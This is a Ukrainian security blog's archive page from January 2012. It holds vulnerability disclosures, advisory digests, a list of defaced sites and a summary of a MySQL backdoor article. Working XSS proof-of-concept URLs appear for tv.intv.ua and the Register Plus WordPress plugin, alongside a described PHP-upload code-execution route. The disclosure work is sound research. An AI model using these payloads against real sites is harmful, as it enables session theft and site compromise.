Архів за Січень, 2012

Уразливості на tv.intv.ua

17:10 28.01.2012

26.06.2009

Сьогодні я знайшов Cross-Site Scripting уразливості на сайті http://tv.intv.ua (це новий домен проекту http://intv-inter.net, при цьому сайт використовує обидва домени). Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливості на intv-inter.net.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

28.01.2012

XSS (в IE при кліку на “Додати в обране”):

http://tv.intv.ua/tv/channel/intv/?id=570507&pid=823');alert(document.cookie);//
http://tv.intv.ua/tv/channel/intv/?id=570507');alert(document.cookie);//

Дані уразливості вже виправлені шляхом заміни движка сайта. Змінили один дірявий движок на інший дірявий (про уразливості в DLE я вже писав неодноразово).

Бекдор в Базі Даних

23:58 27.01.2012

В статті Бэкдор в БД: протроянивания MySQL с помощью хранимых функций, процедур и триггеров розповідається про створення бекдору в СУБД MySQL. Для цього використовуються збережені функції, процедури і трігери.

В своїй статті Розміщення шелів (бекдорів) на сайтах я вже розповідав про можливість розміщення бекдорів безпосередньо в БД. Причому не у вигляді трігерів, а в звичайному записі в таблиці (що можна використати в будь-якій СУБД, як в тих, що підтримують, так і тих, що не підтримують трігери). В цій статті розповідається про інший метод включення бекдора в БД.

В даній статті розглянуті наступні аспекти протроянення MySQL:

  • Збережені процедури і тригери.
  • Необхідність логування.
  • Троянимо WordPress.
  • Трігер для vBulletin.
  • Кришимо “Булку”.
  • Доступ є. Що далі.
  • Старі трюки з UDF.

При наявності доступа до СУБД на сервері, зокрема тих, що підтримують збережені функції, процедури і трігери, нападник, окрім інших напрямків атаки, може протроянити СУБД. І зробити бекдор, що буде знаходитися в СУБД, і відповідно його буде набагато важче виявити.

Уразливості в Apache Tomcat

22:44 27.01.2012

Виявлені уразливості безпеки в Apache Tomcat.

Уразливі версії: Apache Tomcat 6.0, Tomcat 7.0.

DoS, витік інформації.

Похакані сайти №176

20:08 27.01.2012

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

  • http://genich-rada.gov.ua (хакером Dr-Angel) - 12.10.2011 - взломаний державний сайт, зараз сайт вже виправлений адмінами
  • http://vip.bereg-rda.gov.ua (хакером MCA-CRB) - 18.10.2011 - взломаний державний сайт, зараз сайт вже виправлений адмінами
  • http://cartoy.com.ua (хакером Dr-Angel) - 12.10.2011, зараз сайт вже виправлений адмінами
  • http://www.aertecnica.com.ua (хакером Dr-Angel) - 12.10.2011, на сайті все ще розміщений текстовий файл хакера
  • http://hotelgloria.com.ua (хакерами Nasper H4CK і scHool) - 05.01.2012, зараз сайт вже виправлений адмінами

Добірка уразливостей

17:13 27.01.2012

В даній добірці уразливості в веб додатках:

  • Clickjacking attacks in SquirrelMail (деталі)
  • HP SiteScope, Remote Cross Site Scripting (XSS) and Session Fixation Attack (деталі)
  • Vulnerabilities in Samba Web Administration Tool (SWAT) (деталі)
  • phpmyadmin security update (деталі)
  • SQL injection vulnerability in HP Network Automation (деталі)
  • Sitecore CMS 6.4 Open URL Redirect Vulnerability (деталі)
  • Agent Image (news_details.php?news_ID) Remote SQL injection Vulnerability (деталі)
  • Cross-site scripting (XSS) vulnerability in HP Network Automation (деталі)
  • G2webCMS (products.php?cat_id) (member-profile.php?profile) Remote SQL injection Vulnerability (деталі)
  • iCube Lab (product_details.php?cat_id) Remote SQL injection Vulnerability (деталі)

Численні уразливості в Mozilla Firefox, Thunderbird, Seamonkey

23:53 26.01.2012

Виявлені численні уразливості безпеки в Mozilla Firefox, Thunderbird, Seamonkey.

Уразливі продукти: Mozilla Firefox 3.6, Firefox 8.0, Thunderbird 3.1, Thunderbird 8.0, SeaMonkey 2.5.

Пошкодження пам’яті, обхід захисту, цілочислені переповнення, DoS-умови.

  • Mozilla Foundation Security Advisory 2011-53 (деталі)
  • Mozilla Foundation Security Advisory 2011-54 (деталі)
  • Mozilla Foundation Security Advisory 2011-55 (деталі)
  • Mozilla Foundation Security Advisory 2011-56 (деталі)
  • Mozilla Foundation Security Advisory 2011-57 (деталі)
  • Mozilla Foundation Security Advisory 2011-58 (деталі)
  • Mozilla Foundation Security Advisory 2011-59 (деталі)

Вийшов WordPress 3.3.1

22:45 26.01.2012

На початку року, 03.01.2012, лише через пів місяця після виходу WordPress 3.3, вийшла нова версія WordPress 3.3.1.

WordPress 3.3.1 це секюріті та багфікс випуск нової 3.3 серії. В якому розробники виправили 15 багів та одну уразливість.

В версії 3.3 була виявлена Cross-Site Scripting уразливість (що стосується лише WP 3.3), яка була виправлена в даній версії.

Підвищення привілеїв в Apache

19:27 26.01.2012

Виявлена можливість підвищення привілеїв в Apache.

Уразливі версії: Apache 2.0, Apache 2.2.

Підвищення привілеїв через SetEnvif у сполученні з заголовками HTTP-запиту.

Нові уразливості в Register Plus для WordPress

17:16 26.01.2012

06.12.2011

Нещодавно, 25.11.2011, коли я виявив нові уразливості в Register Plus Redux, я також знайшов нові уразливості в плагіні Register Plus для WordPress. Це Cross-Site Scripting, Code Execution та Full path disclosure уразливості. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в Register Plus для WordPress.

Детальна інформація про уразливості з’явиться пізніше.

26.01.2012

XSS:

Використовуючи функцію Autocomplete URL можна провести атаку через GET:

http://site/wp-login.php?action=register&firstname=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-login.php?action=register&lastname=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-login.php?action=register&website=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-login.php?action=register&aim=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-login.php?action=register&yahoo=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-login.php?action=register&jabber=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-login.php?action=register&about=%3C/textarea%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-login.php?action=register&regcode=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уразливі всі ті параметри, що і при POST запиті. Про які я розповідав раніше.

XSS (persistent):

Вказавши XSS код в якості імені файла (наприклад, можна створити такий файл на Linux та Unix системах) та завантаживши його, код викнається на сторінках http://site/wp-admin/options-general.php?page=register-plus та http://site/wp-login.php?action=register.

Code Execution:

Маючи доступ до налаштувань плагіна, можна провести Code Execution (в полі Custom Logo) через аплоадінг файла з довільний розширенням (наприклад, PHP). Для атаки можна просто завантажити 1.php (на відміну від Register Plus Redux, де це неможливо і потрібно використовувати обхідні техніки). Це пов’язано з тим, що використовується власний аплоадер, а не вбудований в WordPress.

Full path disclosure:

При включеній опції плагіна “Enable Invitation Tracking Dashboard Widget” на сторінці http://site/wp-admin/index.php виводиться повний шлях на сервері.

Уразливі Register Plus 3.5.1 та попередні версії. Враховуючи, що даний плагін більше не підтримується розробником, то його користувачам потрібно виправити дірки власноруч. Або оновити цей плагін до версії Register Plus Redux з виправленими уразливостями.

BEAST проти HTTPS

23:52 25.01.2012

Продовжуючи розпочату традицію, після попереднього відео про знаходження панелі адміністратора, пропоную нове відео на веб секюріті тематику. Цього разу відео про BEAST проти HTTPS. Рекомендую подивитися всім хто цікавиться цією темою.

BEAST vs HTTPS

В даному відео ролику розповідається про використання BEAST-атаки. BEAST (Browser Exploit Against SSL/TLS) - це інструментарій для атаки на SSL/TLS, що дозволяє організувати перехоплення переданого в рамках зашифрованого з’єднання Cookie з параметрами аутентифікації користувацької сесії.

У відео показане використання BEAST для отримання кукіса від аккаунта PayPal. Даний інструментарій дешифрує переданий в рамках https-з’єдння сесійний кукіс. Рекомендую подивитися дане відео для розуміння векторів атак через уразливість в SSL/TLS.